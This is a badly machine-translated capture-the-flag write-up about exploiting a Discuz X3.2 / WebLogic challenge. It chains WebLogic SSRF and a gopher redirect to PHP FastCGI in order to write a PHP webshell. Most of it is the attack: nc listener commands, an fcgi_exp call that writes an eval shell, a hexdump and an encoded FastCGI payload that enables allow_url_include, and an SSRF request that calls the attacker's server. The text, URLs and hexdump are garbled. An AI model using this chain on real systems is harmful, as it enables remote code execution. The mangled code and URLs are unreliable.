Three white hats: you from the Stars (1) writeup

The three white hats are from the stars. you (1) writeup officially made three white hats for the first time. it is not easy to do it. you have also stepped on many pitfalls...

0x00 challenges

I lost you from the stars. I may need to use everything I have to use to retrieve you. After two sentences are compiled, I can't make it. okay, I admit that this is the first issue of penetration.

• Tips 1: SSRF
• Tips 2: Maybe you can scan the directory?
• Tips 3:/console/this directory will be helpful to you

0x01 wp Discuz X3.2

When you open the page, the first step is the Discuz X3.2 site. I searched for the new version that was released only in June 1. I found several holes on the search network that have been fixed. so I spent a night searching and gotHint: ssrf

Search for rr chicory of Changting according to law and find an article

Https://blog.chaitin.com/gopher-attack-surfaces/

It is mentioned that ssrf exists in discuz X3.2, and getshell can be used using ssrf + gopher protocol.

However, this exploitation method has a very important problem: the server must enable Gopher wrapper, and the php running method is fastcgi.

After scanning a wave of directories, we found info. php. through phpinfo (), we found that Gopher wrapper was not enabled.

Salted fish found out after a whileHint3/console/

Through this discovery, there is a weblogin station...

WebLogin

The hole here is very simple. I found it slightly.

WooYun: cctv ssrf can snoop on the intranet (Weblogic SSRF case) "> WooYun: cctv ssrf can snoop on the intranet (Weblogic SSRF case)

Test found.

In addition, it can work with the gopher protocol getshell.

According to the Changting blog article, first Test

Construct on the server

#! Php
 

Then listen to Port 2333 on the server

#!bashnc -lvv 2333

Submit Request

#! Bashhttp: // 0761e975dda0c67cb.jie.sange?mao.com/uddi=er/searchpublicregistries.jsp? Operator = http: // server ip/gopher. php & rdoSearch = name & txtSearchname = sdf & txtSearchkey =

We found that we did receive test and confirmed that gopher could use it.

The payload is constructed.

There is an important article about the use of fastcgi.

Http://zone.wooyun.org/content/1060

Generate payload with exp

#!bash./fcgi_exp system 127.0.0.1 2333 /opt/discuz/info.php "echo ‘$_GET[x]($_POST[xx]);’ > /opt/discuz/data/test.php"

Listen to Port 2333

#!bashnc -lvv 2333 > 1.txt

For more information, see 1.txt.

#!bash[email protected]

:/Home/wwwroot/default/fcgi_exp # xxd 1.txt 0000000: 0101 0001 0008 0000 0001 0000 0000 ................ 0000010: 0104 0001 0112 0600 0f14 5343 5249 5054 .......... SCRIPT 0000020: 5f46 494c 454e 414d 452f 6f70 742f 6469 _ FILENAME/opt/di 0000030: 7363 757a 2f69 6e66 6f2e 7068 700d 0144 scuz/info. php .. D 0000040: 4f43 554d 454e 545f 524f 4f54 2f0f 1053 OCUMENT_ROOT /.. S 0000050: 4552 5645 525f 534f 4654 5741 5245 676f ERVER_SOFTWAREgo 0000060: 202f 2066 6367 6963 6c69 656e 7420 0b09/fcgiclient .. 0000070: 5245 4d4f 5445 5f41 4444 5231 3237 2e30 REMOTE_ADDR127.0 0000080: 2e30 2e31 0f08 5345 5256 4552 5f50 524f. 0. 1 .. SERVER_PRO 0000090: 544f 434f 4c48 5454 502f 312e 310e 0343 TOCOLHTTP/1. 1 .. C 00000a0: 4f4e 5445 4e54 5f4c 454e 4754 4831 3033 ONTENT_LENGTH103 00000b0: 0e04 5245 5155 4553 545f 4d45 5448 4f44 .. REQUEST_METHOD 00000c0: 504f 5354 095b 5048 505f 5641 4c55 4561 POST. [PHP_VALUEa 00000d0: 6c6c 6f77 5f75 450C 5f69 6e63 6c75 6465 llow_url_include 00000e0: 203d 204f 6e0a 6469 7361 626c 655f 6675 = On. disable_fu 00000f0: 6e63 7469 6f6e 7320 3d20 0a73 6166 655f nctions =. safe _ 0000100: 6d6f 6465 203d 204f 6666 0a61 7574 6f5f mode = Off. auto _ 0000110: 7072 6570 656e 645f 6669 6c65 203d 2070 prepend_file = p 0000120: 6870 3a2f 2f69 6e70 7574 0000 0000 hp: // input ...... 0000130: 0104 0001 0000 0000 0105 0001 0067 ............. g .. 0000140: 3c3f 7068 7020 7379 7374 656d 2827 6563 /Opt/discu 0000170: 7a2f 6461 7461 2f64 646f 672e 7068 7027 z/data/test. php '2017: 293b 0000180 6469 272d 2d2d 2d2d 6528 3076); die ('----- 0vcd 6364: 0000190 running f 6a75 6233 3039 6238 2d2d 2d2d b34oju09b8fd ---- running 1A0: 2d0a 6664 3b3f 3e00 -. ');?>.

Then you need urlencode.

#!python>>> f = open('1.txt')>>> ff = f.read()>>> from urllib import quote>>> quote(ff)'%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%12%06%00%0F%14SCRIPT_FILENAME/opt/discuz/info.php%0D%01DOCUMENT_ROOT/%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH103%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00g%01%00%3C%3Fphp%20system%28%27echo%20%E2%80%98%5Bx%5D%28%5Bxx%5D%29%3B%E2%80%99%20%3E%20/opt/discuz/data/test.php%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00'

Construct gopher. php

#!php
 

Request

#!bashhttp://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip/gopher.php&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

Because discuz's data is writable by default, the failure to successfully write data to webshell is caused by the failure to know why the shell cannot be replayed.

0x02 after question?

After finishing the question, I want to go into a deep wave of principles. as a result, I suddenly found that the question was actually last year's hitcon quals web400 lalala.

Http://kb.hitcon.org/post/131488130087/hitcon-ctf-2015-quals-web-%E5%87%BA%E9%A1%8C%E5%BF%83%E5%BE%97

The core concept of the entire question is to bypass SSRF through 302, and then use the gopher in SSRF to execute remote code using the local FastCGI prtocol.

In reality, if php fastcgi is open to the public network, you can use shell.

Php-fpm listens to Port 9000 by default. use PHP_ADMIN_VALUE to set allow_url_include to on and add auto_prepend_file. use php: // input to execute php code to write a shell.